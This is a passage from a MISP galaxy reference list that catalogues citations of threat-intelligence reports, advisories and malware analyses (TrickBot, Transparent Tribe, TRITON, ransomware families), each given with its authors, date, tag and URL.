https://www.datawire.io/code-injection-on-linux-and-macos/

FireEye Fin8 May 2016

Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="FireEye Fin8 May 2016"

Table 15762. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

Proofpoint TA407 September 2019

Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Proofpoint TA407 September 2019"

Table 15763. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

Proofpoint TA505 Sep 2017

Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Proofpoint TA505 Sep 2017"

Table 15764. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter

U.S. CISA CVE-2023-3519 Exploits

Cybersecurity and Infrastructure Security Agency. (2023, July 20). Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells. Retrieved July 24, 2023.

The tag is: misp-galaxy:references="U.S. CISA CVE-2023-3519 Exploits"

Table 15765. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a

U.S. CISA CVE-2023-35078 Exploits

Cybersecurity and Infrastructure Security Agency. (2023, August 1). Threat Actors Exploiting Ivanti EPMM Vulnerabilities. Retrieved August 3, 2023.

The tag is: misp-galaxy:references="U.S. CISA CVE-2023-35078 Exploits"

Table 15766. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a

U.S. CISA Ivanti Exploits February 2024

Cybersecurity and Infrastructure Security Agency. (2024, February 29). Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways. Retrieved March 1, 2024.

The tag is: misp-galaxy:references="U.S. CISA Ivanti Exploits February 2024"

Table 15767. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b

Atlas SEO

Atlas Cybersecurity. (2021, April 19). Threat Actors use Search-Engine-Optimization Tactics to Redirect Traffic and Install Malware. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Atlas SEO"

Table 15768. Table References

Links

https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/

Cybereason TA505 April 2019

Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Cybereason TA505 April 2019"

Table 15769. Table References

Links

https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware

Cisco CaddyWiper March 2022

Malhotra, A. (2022, March 15). Threat Advisory: CaddyWiper. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="Cisco CaddyWiper March 2022"

Table 15770. Table References

Links

https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html

Carbon Black Squiblydoo Apr 2016

Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Carbon Black Squiblydoo Apr 2016"

Table 15771. Table References

Links

https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/

Aqua Build Images on Hosts

Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Aqua Build Images on Hosts"

Table 15772. Table References

Links

https://blog.aquasec.com/malicious-container-image-docker-container-host

Aqua Kinsing April 2020

Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Aqua Kinsing April 2020"

Table 15773. Table References

Links

https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

Palo Alto Networks Black Basta August 2022

Elsad, A. (2022, August 25). Threat Assessment: Black Basta Ransomware. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Palo Alto Networks Black Basta August 2022"

Table 15774. Table References

Links

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware

Unit42 Clop April 2021

Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021.

The tag is: misp-galaxy:references="Unit42 Clop April 2021"

Table 15775. Table References

Links

https://unit42.paloaltonetworks.com/clop-ransomware/

Palo Alto Unit 42 EKANS

Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.

The tag is: misp-galaxy:references="Palo Alto Unit 42 EKANS"

Table 15776. Table References

Links

https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/

UNIT 42 LAPSUS Mar 2022

UNIT 42. (2022, March 24). Threat Brief: Lapsus$ Group. Retrieved May 17, 2022.

The tag is: misp-galaxy:references="UNIT 42 LAPSUS Mar 2022"

Table 15777. Table References

Links

https://unit42.paloaltonetworks.com/lapsus-group/

Unit 42 WhisperGate January 2022

Falcone, R. et al.. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022.

The tag is: misp-galaxy:references="Unit 42 WhisperGate January 2022"

Table 15778. Table References

Links

https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/#whispergate-malware-family

Unit 42 DGA Feb 2019

Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.

The tag is: misp-galaxy:references="Unit 42 DGA Feb 2019"

Table 15779. Table References

Links

https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/

Dell TG-3390

Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.

The tag is: misp-galaxy:references="Dell TG-3390"

Table 15780. Table References

Links

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

SecureWorks TG-4127

SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="SecureWorks TG-4127"

Table 15781. Table References

Links

https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign

McAfee APT28 DDE1 Nov 2017

Sherstobitoff, R., Rea, M. (2017, November 7). Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="McAfee APT28 DDE1 Nov 2017"

Table 15782. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/

Awake Security Avaddon

Gahlot, A. (n.d.). Threat Hunting for Avaddon Ransomware. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Awake Security Avaddon"

Table 15783. Table References

Links

https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/

Awake Security C2 Cloud

Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Awake Security C2 Cloud"

Table 15784. Table References

Links

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

Detecting Command & Control in the Cloud

Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="Detecting Command & Control in the Cloud"

Table 15785. Table References

Links

https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/

Threat Matrix for Kubernetes

Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Threat Matrix for Kubernetes"

Table 15786. Table References

Links

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

SecureWorks BRONZE MOHAWK n.d.

SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="SecureWorks BRONZE MOHAWK n.d."

Table 15787. Table References

Links

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

ESET T3 Threat Report 2021

ESET. (2022, February). THREAT REPORT T3 2021. Retrieved February 10, 2022.

The tag is: misp-galaxy:references="ESET T3 Threat Report 2021"

Table 15788. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf

BlackBerry Amadey 2020

Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="BlackBerry Amadey 2020"

Table 15789. Table References

Links

https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot

CiscoAngler

Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="CiscoAngler"

Table 15790. Table References

Links

https://blogs.cisco.com/security/talos/angler-domain-shadowing

Talos IPFS 2022

Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Talos IPFS 2022"

Table 15791. Table References

Links

https://blog.talosintelligence.com/ipfs-abuse/

Cisco Group 72

Esler, J., Lee, M., and Williams, C. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="Cisco Group 72"

Table 15792. Table References

Links

http://blogs.cisco.com/security/talos/threat-spotlight-group-72

Talos ZxShell Oct 2014

Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.

The tag is: misp-galaxy:references="Talos ZxShell Oct 2014"

Table 15793. Table References

Links

https://blogs.cisco.com/security/talos/opening-zxshell

Infinitum IT LockBit 3.0

Infinitum IT. (n.d.). Threat Spotlight: Lockbit Black 3.0 Ransomware. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="Infinitum IT LockBit 3.0"

Table 15794. Table References

Links

https://raw.githubusercontent.com/whichbuffer/Lockbit-Black-3.0/main/Threat%20Spotlight%20Lockbit%20Black%203.0%20Ransomware.pdf

BlackBerry SystemBC June 10 2021

The BlackBerry Research & Intelligence Team. (2021, June 10). Threat Thursday: SystemBC – a RAT in the Pipeline. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="BlackBerry SystemBC June 10 2021"

Table 15795. Table References

Links

https://blogs.blackberry.com/en/2021/06/threat-thursday-systembc-a-rat-in-the-pipeline

DOJ North Korea Indictment Feb 2021

Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021.

The tag is: misp-galaxy:references="DOJ North Korea Indictment Feb 2021"

Table 15796. Table References

Links

https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and

Symantec Thrip June 2018

Security Response Attack Investigation Team. (2018, June 19). Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="Symantec Thrip June 2018"

Table 15797. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

FireEye Bootkits

Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.

The tag is: misp-galaxy:references="FireEye Bootkits"

Table 15798. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

SpecterOps AWS Traffic Mirroring

Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="SpecterOps AWS Traffic Mirroring"

Table 15799. Table References

Links

https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512

Ossmann Star Feb 2011

Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="Ossmann Star Feb 2011"

Table 15800. Table References

Links

https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html

Symantec Tick Apr 2016

DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="Symantec Tick Apr 2016"

Table 15801. Table References

Links

https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

TightVNC Software Project Page

TightVNC Software. (n.d.). TightVNC Software. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="TightVNC Software Project Page"

Table 15802. Table References

Links

https://www.tightvnc.com/

AnyRun TimeBomb

Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="AnyRun TimeBomb"

Table 15803. Table References

Links

https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/

Microsoft TimeProvider

Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.

The tag is: misp-galaxy:references="Microsoft TimeProvider"

Table 15804. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx

Talos TinyTurla September 2021

Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.

The tag is: misp-galaxy:references="Talos TinyTurla September 2021"

Table 15805. Table References

Links

https://blog.talosintelligence.com/2021/09/tinyturla.html

Pentestlab Token Manipulation

netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.

The tag is: misp-galaxy:references="Pentestlab Token Manipulation"

Table 15806. Table References

Links

https://pentestlab.blog/2017/04/03/token-manipulation/

Langer Stuxnet

Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet’s Creators Tried to Achieve. Retrieved December 7, 2020.

The tag is: misp-galaxy:references="Langer Stuxnet"

Table 15807. Table References

Links

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

TrendMicro Tonto Team October 2020

Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="TrendMicro Tonto Team October 2020"

Table 15808. Table References

Links

https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf

NorthSec 2015 GData Uroburos Tools

Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.

The tag is: misp-galaxy:references="NorthSec 2015 GData Uroburos Tools"

Table 15809. Table References

Links

https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html

Dingledine Tor The Second-Generation Onion Router

Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Dingledine Tor The Second-Generation Onion Router"

Table 15810. Table References

Links

http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf

FireEye FIN7 Shim Databases

Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.

The tag is: misp-galaxy:references="FireEye FIN7 Shim Databases"

Table 15811. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

LOLBAS Tracker

LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Tracker"

Table 15812. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/

BushidoToken Scattered Spider August 16 2023

BushidoToken. (2023, August 16). Tracking Adversaries: Scattered Spider, the BlackCat affiliate. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="BushidoToken Scattered Spider August 16 2023"

Table 15813. Table References

Links

https://blog.bushidotoken.net/2023/08/tracking-adversaries-scattered-spider.html

Lateral Movement Payne

Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.

The tag is: misp-galaxy:references="Lateral Movement Payne"

Table 15814. Table References

Links

https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts

Unit 42 KerrDown February 2019

Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus’ new Downloader, KerrDown. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Unit 42 KerrDown February 2019"

Table 15815. Table References

Links

https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/

Trend Micro TeamTNT

Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Trend Micro TeamTNT"

Table 15816. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf

SANS Windshift August 2018

Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="SANS Windshift August 2018"

Table 15817. Table References

Links

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf

Microsoft TxF

Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft TxF"

Table 15818. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx

Rclone-mega-extortion_05_2021

Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Rclone-mega-extortion_05_2021"

Table 15819. Table References

Links

https://redcanary.com/blog/rclone-mega-extortion/

JScrip May 2018

Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="JScrip May 2018"

Table 15820. Table References

Links

https://docs.microsoft.com/windows/win32/com/translating-to-jscript

tt_obliqueRAT

Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022.

The tag is: misp-galaxy:references="tt_obliqueRAT"

Table 15821. Table References

Links

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

Talos Transparent Tribe May 2021

Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="Talos Transparent Tribe May 2021"

Table 15822. Table References

Links

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

Cisco Talos Transparent Tribe Education Campaign July 2022

  1. Baisini. (2022, July 13). Transparent Tribe begins targeting education sector in latest campaign. Retrieved September 22, 2022.

The tag is: misp-galaxy:references="Cisco Talos Transparent Tribe Education Campaign July 2022"

Table 15823. Table References

Links

https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html

tt_httrack_fake_domains

Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.

The tag is: misp-galaxy:references="tt_httrack_fake_domains"

Table 15824. Table References

Links

https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html

Securelist Trasparent Tribe 2020

Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Securelist Trasparent Tribe 2020"

Table 15825. Table References

Links

https://securelist.com/transparent-tribe-part-1/98127/

Kaspersky Transparent Tribe August 2020

Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="Kaspersky Transparent Tribe August 2020"

Table 15826. Table References

Links

https://securelist.com/transparent-tribe-part-1/98127/

Microsoft TransportAgent Jun 2016

Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.

The tag is: misp-galaxy:references="Microsoft TransportAgent Jun 2016"

Table 15827. Table References

Links

https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help

Trap Manual

ss64. (n.d.). trap. Retrieved May 21, 2019.

The tag is: misp-galaxy:references="Trap Manual"

Table 15828. Table References

Links

https://ss64.com/bash/trap.html

Red Canary Netwire Linux 2022

TONY LAMBERT. (2022, June 7). Trapping the Netwire RAT on Linux. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="Red Canary Netwire Linux 2022"

Table 15829. Table References

Links

https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/

Cyberciti Trap Statements

Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.

The tag is: misp-galaxy:references="Cyberciti Trap Statements"

Table 15830. Table References

Links

https://bash.cyberciti.biz/guide/Trap_statement

Dept. of Treasury Iran Sanctions September 2020

Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.

The tag is: misp-galaxy:references="Dept. of Treasury Iran Sanctions September 2020"

Table 15831. Table References

Links

https://home.treasury.gov/news/press-releases/sm1127

Treasury EvilCorp Dec 2019

U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.

The tag is: misp-galaxy:references="Treasury EvilCorp Dec 2019"

Table 15832. Table References

Links

https://home.treasury.gov/news/press-releases/sm845

Treasury North Korean Cyber Groups September 2019

US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Treasury North Korean Cyber Groups September 2019"

Table 15833. Table References

Links

https://home.treasury.gov/news/press-releases/sm774

Mandiant APT29 Trello

Wolfram, J. et al. (2022, April 28). Trello From the Other Side: Tracking APT29 Phishing Campaigns. Retrieved August 3, 2022.

The tag is: misp-galaxy:references="Mandiant APT29 Trello"

Table 15834. Table References

Links

https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns

Malicious Chrome Extension Numbers

Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="Malicious Chrome Extension Numbers"

Table 15835. Table References

Links

https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf

Triage 23893f035f8564dfea5030b9fdd54120d96072bb

tria.ge. (n.d.). Triage 23893f035f8564dfea5030b9fdd54120d96072bb. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Triage 23893f035f8564dfea5030b9fdd54120d96072bb"

Table 15836. Table References

Links

https://tria.ge/230726-q34mlacc72

Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7

tria.ge. (n.d.). Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7"

Table 15837. Table References

Links

https://tria.ge/231004-q6y7aaeb22

exatrack bpf filters passive backdoors

ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.

The tag is: misp-galaxy:references="exatrack bpf filters passive backdoors"

Table 15838. Table References

Links

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

Malwarebytes TrickBot Sep 2019

Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="Malwarebytes TrickBot Sep 2019"

Table 15839. Table References

Links

https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/

TrendMicro Trickbot Feb 2019

Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.

The tag is: misp-galaxy:references="TrendMicro Trickbot Feb 2019"

Table 15840. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/

Eclypsium Trickboot December 2020

Eclypsium, Advanced Intelligence. (2020, December 1). TRICKBOT NOW OFFERS ‘TRICKBOOT’: PERSIST, BRICK, PROFIT. Retrieved March 15, 2021.

The tag is: misp-galaxy:references="Eclypsium Trickboot December 2020"

Table 15841. Table References

Links

https://eclypsium.com/wp-content/uploads/2020/12/TrickBot-Now-Offers-TrickBoot-Persist-Brick-Profit.pdf

IBM X-Force ITG23 Oct 2021

Villadsen, O., et al. (2021, October 13). Trickbot Rising - Gang Doubles Down on Infection Efforts to Amass Network Footholds. Retrieved June 15, 2023.

The tag is: misp-galaxy:references="IBM X-Force ITG23 Oct 2021"

Table 15842. Table References

Links

https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

Trend Micro Trickbot Nov 2018

Anthony, N., Pascual, C.. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018.

The tag is: misp-galaxy:references="Trend Micro Trickbot Nov 2018"

Table 15843. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/

Joe Sec Trickbot

Joe Security. (2020, July 13). TrickBot’s new API-Hammering explained. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Joe Sec Trickbot"

Table 15844. Table References

Links

https://www.joesecurity.org/blog/498839998833561473

Fortinet TrickBot

Bacurio Jr., F. and Salvio, J. (2018, April 9). Trickbot’s New Reconnaissance Plugin. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Fortinet TrickBot"

Table 15845. Table References

Links

https://www.fortinet.com/blog/threat-research/trickbot-s-new-reconnaissance-plugin.html

Trickbot VNC module July 2021

Ionut Illascu. (2021, July 14). Trickbot updates its VNC module for high-value targets. Retrieved September 10, 2021.

The tag is: misp-galaxy:references="Trickbot VNC module July 2021"

Table 15846. Table References

Links

https://www.bleepingcomputer.com/news/security/trickbot-updates-its-vnc-module-for-high-value-targets/

Fidelis TrickBot Oct 2016

Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.

The tag is: misp-galaxy:references="Fidelis TrickBot Oct 2016"

Table 15847. Table References

Links

https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre

Bromium Ursnif Mar 2017

Holland, A. (2019, March 7). Tricks and COMfoolery: How Ursnif Evades Detection. Retrieved June 10, 2019.

The tag is: misp-galaxy:references="Bromium Ursnif Mar 2017"

Table 15848. Table References

Links

https://www.bromium.com/how-ursnif-evades-detection/

IBM TrickBot Nov 2016

Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018.

The tag is: misp-galaxy:references="IBM TrickBot Nov 2016"

Table 15849. Table References

Links

https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/

TrendMictro Phishing

Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="TrendMictro Phishing"

Table 15850. Table References

Links

https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html

Trimarc Detecting Password Spraying

Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.

The tag is: misp-galaxy:references="Trimarc Detecting Password Spraying"

Table 15851. Table References

Links

https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing

Dragos TRISIS

Dragos. (2017, December 13). TRISIS Malware Analysis of Safety System Targeted Malware. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Dragos TRISIS"

Table 15852. Table References

Links

https://www.dragos.com/wp-content/uploads/TRISIS-01.pdf

FireEye TRITON 2019

Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="FireEye TRITON 2019"

Table 15853. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html

FireEye TEMP.Veles JSON April 2019

Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.

The tag is: misp-galaxy:references="FireEye TEMP.Veles JSON April 2019"

Table 15854. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html

FireEye TEMP.Veles 2018

FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="FireEye TEMP.Veles 2018"

Table 15855. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

Palo Alto MoonWind March 2017

Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieved March 30, 2017.

The tag is: misp-galaxy:references="Palo Alto MoonWind March 2017"

Table 15856. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

CyberESI GTALK

CyberESI. (2011). TROJAN.GTALK. Retrieved June 29, 2015.

The tag is: misp-galaxy:references="CyberESI GTALK"

Table 15857. Table References

Links

http://www.cyberengineeringservices.com/2011/12/15/trojan-gtalk/

Symantec Hydraq Jan 2010

Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.

The tag is: misp-galaxy:references="Symantec Hydraq Jan 2010"

Table 15858. Table References

Links

